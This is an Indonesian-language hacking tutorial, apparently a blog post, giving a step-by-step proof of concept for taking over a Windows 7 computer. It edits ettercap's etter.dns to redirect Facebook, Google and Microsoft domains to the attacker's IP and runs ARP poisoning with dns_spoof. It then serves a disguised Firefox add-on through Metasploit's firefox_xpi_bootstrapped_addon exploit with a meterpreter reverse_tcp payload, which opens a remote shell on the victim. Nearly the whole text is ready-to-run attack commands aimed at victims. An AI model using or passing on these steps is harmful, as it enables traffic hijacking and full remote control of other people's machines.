Hack windows menggunakan add on dan dns spoof





Untuk memasuki system windows 7 ada banyak cara salah satunya memanipulasi add on dari mozilla ketika menjalankan exploit ini browser korban akan muncul dialog penginstalan add on mozilla ketika korban klik install dan menjalankan payload dengan hak akses penuh pada komputer korban dan berhasil telah saya coba pad lab saya

berikut POC nya

Atur dulu dns spoof nya
buka console lalu ketikkan perintah
locate etter.dns


untuk mengetahui letak pengaturan ettercap

kemudian atur dns spoofnya di pengaturan etter.dns
gedit /usr/local/share/ettercap/etter.dns



rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.74
tambahkan facebook di  bagian ini
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#                                                                          

facebook.com       A   192.168.1.74
*facebook.com      A   192.168.1.74
www.facebook.com   A   192.168.1.74
google.com         A   192.168.1.74
*google.com        A   192.168.1.74
www.google.com     A   192.168.1.74
microsoft.com      A   192.168.1.74
*.microsoft.com    A   192.168.1.74
www.microsoft.com  PTR 192.168.1.74      # Wildcards in PTR are not allowed

Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita


KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab




setelah itu save

Ketika sudah di set buka msfconsole pada terminal backtrack

Tunggu hingga metasploit muncul dan ketikkan perintah exploitnya
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload windows/meterpreter/reverse_tcp
set addonname Upadating
set srvhost 192.168.1.74 --> ip lokal kita
set srvport 80
set uripath /

set lhost 192.168.1.74 --> ip lokal kita
set lport 443
exploit



sekarang kita coba untuk menjalankan spoofing

buka terminal baru lalu ketikkan di terminal
ettercap -Tqi wlan0 -P dns_spoof -M arp // //


ket = wlan0 adalah interface wifi saya untuk mengeceknya bisa ketikkan airmon-ng untuk melihat interface nya



Tunggu korban membuka facebook.com/google.com supaya di spoofing ke malicious ip kita
dan sukses korban membuka google.com yang nantinya di alihkan ke malicious ip kita



dan tunggu hingga korban menginstall add on malicious tadi


dan sessions telah di buka
tekan ctrl + c karna session 1 telah di buka
ketikkan sessions -i 1 untuk membuka sesi pertama


dan pc tersebut berada di tangan kamu